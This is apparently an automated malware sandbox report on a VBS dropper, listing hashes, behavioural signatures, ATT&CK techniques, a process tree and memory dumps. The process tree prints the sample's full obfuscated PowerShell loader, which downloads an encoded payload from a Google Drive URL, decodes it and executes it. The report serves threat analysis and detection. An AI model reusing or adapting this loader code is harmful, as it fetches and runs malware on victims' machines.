c35bfeb23cb378e33d9c0f953db2c23f03575a70b5157e428621e5a71456040f

General

Target

27b8abaa4457130d3435ae7db4ae8049c48c50a700a535029ce1f8c621877579.vbs
Size

210KB
MD5

4a6be1b6607a80a583ff05c2ed8908ef
SHA1

5073ceb6220c10c872b58d433c0d46994353af4e
SHA256

27b8abaa4457130d3435ae7db4ae8049c48c50a700a535029ce1f8c621877579
SHA512

25a9df574bf012aa79f9787736ed65eb3cfc3976e5a18137611615a7a99fb2a0614f98086260e85b880d932b46ffea1bc905a8d2cc2fac049eafb4040d8f817f
SSDEEP

6144:lYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJf6q6I:e2dOUB6

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2156	WScript.exe
7	2516	powershell.exe
9	2516	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2516	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2516	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 2516	2156	WScript.exe	28
PID 2156 wrote to memory of 2516	2156	WScript.exe	28
PID 2156 wrote to memory of 2516	2156	WScript.exe	28
PID 2516 wrote to memory of 2476	2516	powershell.exe	30
PID 2516 wrote to memory of 2476	2516	powershell.exe	30
PID 2516 wrote to memory of 2476	2516	powershell.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27b8abaa4457130d3435ae7db4ae8049c48c50a700a535029ce1f8c621877579.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kindbakke = 1;$Unwebbed='Substrin';$Unwebbed+='g';Function Snese($Heraldically63){$Skdskindets=$Heraldically63.Length-$Kindbakke;For($Smand=5; $Smand -lt $Skdskindets; $Smand+=(6)){$Septangled+=$Heraldically63.$Unwebbed.Invoke($Smand, $Kindbakke);}$Septangled;}function Begreberne($Mellemdistancevaabnene){. ($Heterochromosome) ($Mellemdistancevaabnene);}$Bonteboks=Snese 'SamleMKnojeo Outsz .kbniHjfrelTa.stlBlemoaUhums/Tol g5 Kla,.Brink0Inter Hears( enatW.odstiDiglonBevg,dme ico Ret w farvsPosix Tale NIstniT vers Pa do1 Aroi0Squim.Count0Jn,tb;Lappe VuggeW.eforiEmmysnHippi6D.vot4tre,a;.tati Scorpx Lgeh6D.skb4.nnov;sluta fotoarGenevvOphre:Brovt1So,en2Despo1Artik.Strgk0Fortl)unp,o uprisGTred.eSprigcEye.akStedso Appe/unl.w2Iri i0M.dic1 p.ys0 s,ri0 ,aml1Alkoh0 Tewe1Asmal ReissF,olkli envir UndeeTrithfLea,eo StroxPlica/ form1Bolds2 ,omi1Oxymo.Futur0Almin ';$diarrheal=Snese 'BlokkUFinhesUlmede ErasrMalp,-KnudiADcapog Rub.eModhanBynavtNaive ';$Independentism=Snese 'SoundhLo.est ,asitPolyspIngens,arss:Stedb/Ped i/TrilodGrandrForlfi.tromvvi,eoeSkoli. En,rgArthro Spr,o ForegAmli lPsy heRekin.Paysac Trado SprimSelvb/UbehauBevidc Bitt?CuddleCoalixKunorpFr.heoPalaerAl umtUnder=ShelldBabasoDec,mwStemnnTiletlRebsloFili aPapi.dSwidd& ,pheiB.spedC.toq= Form1KalaswTargeJAcor.iFlok uSheoaGCrammbCosie3Svrddr A roTLuksuFChar.Mpain,vLactej,elepLFrytlZTeleg3WolfldMorroPSn rr0Andr.ELegevkEpiglmMinutO Xerf2Pronec ark,xAfspn5Dagobkwinds8Begra6 Skov_.steoeUnder ';$Ndtrftigst=Snese 'Dknin>.ramm ';$Heterochromosome=Snese 'Arbeji DemoeSmokoxMaron ';$Forlsendes = Snese 'Breadea.tiscIndkrhAbo noG nne Sp.yn% H,nparelsep eetp tuddSli eaProtet supeaOktav%Bered\kadavTLidk.iInkasl OptokGif bmForpupDdnine FisslcontasMedene Akse. IdioOBevidwCon ee rois Lautu& Atri&under Ex.eeMods.cDis,rh CopooEdwar Stamk$Pre n ';Begreberne (Snese 'Depen$EmbreghuxlelFelt.oForbeb App aSoloslUtsme: AppeK amilaInstrtFiskehCocktrSfartiCeratnDiase=Perin(MandacMaplemIsl.dd Eksp Prodr/punticArea, Repos$GutsiFBindeoPourpr DagslKom.isK.ntoeUnismnInitidUregee Appesgn,vp)Skriv ');Begreberne (Snese 'R yth$DehydgGaleelMorbioRa.dmbsuperaSpon lBilla:Carb,BResknuSwal.lkntr.l MavohForudePo,tuaRegisd Ops,eForfedObstilCoconyRa,fi= Cl,n$,eturIVacuonKultudStileetabt,p Barge PlasnAntipdDigteeGod enK,lontKn thiYeellsUnbrum Raak.schops uganpLedigl KonkiPlougtMi ro(Sulte$uns.rN DiaddvicentFi kerMarcof,rthot.umeriV dergdramasS.ednt Cafe)Ls gl ');$Independentism=$Bullheadedly[0];Begreberne (Snese 'Scull$ gunygBan.vlStokkoin,erb JernaB,ickl Offe: A.efW Un,ne Opism Mor,=IdsnoNUninfeForrawhobbe-Lys pOKamm.bG,ngejAmp,ueAlgolcS udstperis BkkenStarnayRetsfsNikketSociaeMetalm k,ek.IndivNLanaaeIkendtMonog.UnderWI.tsteWycl.bJapo CKl.nil Bredi,iniseGaastnDyrebt.tere ');Begreberne (Snese 'F.laf$W,anoW OvereHyothmKry.t.AudioHInddkeMercaaAntird.eappeSpirerDekadsfootp[Impro$F rtod KulmiPecula Ash r LsperGoldihOutcaeSwif aCertil Tran]Litte=Gode,$IsoleBDiadro.geblnDiamat udlne Offub GlasoSelvokAnisosTyvet ');$ky=Snese 'GaareW Filme Fej.m A,fl.uprooDW,wrgo SurmwP,aklnTryk.lCrossoMul saFi kedKaffeFSadlei GuanlSpi.deangak(Nondi$t,ranITest nBun.fd LysreProkupArsineChen.nKommodastroeTilstn CoattPropei Kvals,lytrmch.vi,H.rmo$ AfgiF Di soTwinkrdukkhs HenstRehasebagaunBifloi AlfrnminuegHorissspeci)Opdrt ';$ky=$Kathrin[1]+$ky;$Forstenings=$Kathrin[0];Begreberne (Snese 'Bone $KlistgSofislSk oto DjvebI eala Me,ulFilia:IsuroRGro.eeTeltpm SandoPangun Armet Modse ThairAyuyuiRepasn UmorgA xofeOverfnFlocc=Endep(E,herTDejageP,rtisDiscrtBaret- BundP F teaBaciltOverrhIk na Kurve$DiverFRveskoPartirAkro.s Endet BevgeAkromn PostiPaa,rn RifagLa dssUopla) Urte ');while (!$Remonteringen) {Begreberne (Snese ' Sept$RedregFraa.l Re,roT,mpebeksamaKna,llDe.at: Sel,MLeigeoWalenrEpinamYsetto Ye,lrTupelaMand n MantdS,mmeoxiph.= Bise$StukktSterlrUnsatuBucepe Fdeg ') ;Begreberne $ky;Begreberne (Snese ' RenoSShee tpleuraGondorTandbt.rang-Ver.iSBrickl TekneLovore Antip Muco Arabi4Caduc ');Begreberne (Snese ' udai$Hona.gDesenlC,assoBroccb Optaa ilkelPal,i:MetamRStaaleCodesmSonedoImmo,nCluritagerseculmirA,etoiJernanD cyegEvente Byk nJurat=Kvlde(LunatTRancheScenesSammetChast-HeminPHypnaaSideht UnclhOverf Milie$KodniFSydfoo CorsrEngres Lea tAnstte ,nfunAquadi PargnUnabjgIncorsStign)M,sin ') ;Begreberne (Snese 'K mpa$RelivgVineyl PostoAdoptb InhaaUnshrl Grns:Sp,llROut.ie sig.cUns olrekyli lantnFirebeSpillsMoha.=Dysur$CoracgB.ttelHelsioHensybRhabaahrvrkl Bort:OutwoKSprayueccenr prossDa oieProcerherponHulebeParad1,repa8Musik8St rg+Detac+.rbej%.pmun$DebatB K louPhaeolUbehalStudihRandpe.ennia P.nedSlj,reV jfodRou,elunsavyProcl.An.iccad poo U biu ummndesoxt,isso ') ;$Independentism=$Bullheadedly[$Reclines];}Begreberne (Snese 'extol$Res fg Eu.hl brttoStrygbflegma TemplIntr,:AssoccChanciEva.gsHookutGar ev S edaperhye G rtnSa,ge Be a= Usal HedebGEx,iseUnhedtR wbo- ErhvCD.geroPrisenhousetBird.eUns.pn RekutTakke ldst$SprlsFAni.ao Bea.r X.losHaardtmalereSem vnPresbiBucchnKissyg SundsMenda ');Begreberne (Snese 'Afbre$TugtegVendelUnchao Eks b Tesaa UopslFes o:U,driSFangstDiurniMenuakPreexlArbe.aPreeng ImpenImposeOphiorHa,ainAutoce,ynli N lko=re is Disko[mudpaSOxyntyIranis Kvs.t lphaeEmendmBagat. Ti fCNumisoKlovnn V.luvChowee lerkrOvul,tIn,ia]Ateli: Nirl:ProduFSpecirDisproTekstmCircuB Eva adrjhesbevgee Radi6Radio4AgoraSSvecit BeserImproiTomiun.agsigThron(Inge.$Kam.kc,npreiGa,nisSygdotTa pov Afsga AlareDan.ynSal,s)Misdi ');Begreberne (Snese 'saddu$ Kam.gFunctlCountoAssimbVa,lea Ordkl Bour:veranO ObjedFlyveoO.erfnBrletthaandelinjexUdforeGald sForskiBeaugsSu,ti Mon t=bivir Vi,ti[CooniSChrisyFortnsUtilitTid.feSkuddmC ntr.BlockTF,dboefanatxAp.titDomes.O,rusE WyannTotalcBolsjoAnmrkdfrgeliBesudnToolmgVddel]Uddat:preaf:Ba daATamonSg,dsfCb mbyIEnro.I Vide.OpstiGboeg,e ForutGuld,SActint,fbinrCo.muiBar en onisgtrans(Na re$CelatSSamlet h ndiFrdigkBy,gelCarumaSpinsgFladlnCrespepalisrSk ann ,urdeUddis)Robep ');Begreberne (Snese 'manif$.artig Ma,hlNonmeoCaptibSly,gaFl.cclMiner:VasstH ZincuScytomAnticmUnstueMegaltUncom= Ca d$EpibaOAcierdB,rdeoOblatnSorbotExcomeni,raxObjeceTrolds Mi,diIridostrkga.PallisbenziuNeuryb .ommsToyfut Antir almai Us enMaanegSerab(L ndb3Indla2Photo4Veder1Cepha4Tiles2udenr, Konf2Pound9Oegep2Hunde9 nder4Unmis) Gyro ');Begreberne $Hummet;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tilkmpelse.Owe && echo $"
    3⤵
    PID:2476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2516-22-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-21-0x000000001B510000-0x000000001B7F2000-memory.dmp

Filesize
2.9MB

Download
memory/2516-24-0x0000000002970000-0x0000000002978000-memory.dmp

Filesize
32KB

Download
memory/2516-23-0x0000000002CB0000-0x0000000002D30000-memory.dmp

Filesize
512KB

Download
memory/2516-25-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-26-0x0000000002CB0000-0x0000000002D30000-memory.dmp

Filesize
512KB

Download
memory/2516-27-0x0000000002CB0000-0x0000000002D30000-memory.dmp

Filesize
512KB

Download
memory/2516-28-0x0000000002CB0000-0x0000000002D30000-memory.dmp

Filesize
512KB

Download
memory/2516-31-0x0000000002CB0000-0x0000000002D30000-memory.dmp

Filesize
512KB

Download
memory/2516-32-0x000007FEF5890000-0x000007FEF622D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing